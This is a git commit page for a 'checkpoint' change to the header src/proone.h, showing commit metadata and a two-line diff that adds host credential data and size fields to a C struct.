diff options
author | David Timber <mieabby@gmail.com> | 2020-01-01 08:47:51 +1100 |
---|---|---|
committer | David Timber <mieabby@gmail.com> | 2020-01-01 08:47:51 +1100 |
commit | 6e456edb2757cf9d28d306afb836aa16780fb912 (patch) | |
tree | 2744c874583f03d70ef2aaeb405c74fb5b65ff75 /src/proone.h | |
parent | 85d78af0cd8b809abc28491c46c648a242053044 (diff) |
checkpoint
Diffstat (limited to 'src/proone.h')
-rw-r--r-- | src/proone.h | 2 |
1 files changed, 2 insertions, 0 deletions
diff --git a/src/proone.h b/src/proone.h index c40a1b1..49e9d9c 100644 --- a/src/proone.h +++ b/src/proone.h @@ -6,6 +6,8 @@ struct proone_global { + uint8_t *host_cred_data; + size_t host_cred_size; bool has_proc_lim_lock; bool bin_ready; int caught_signal; |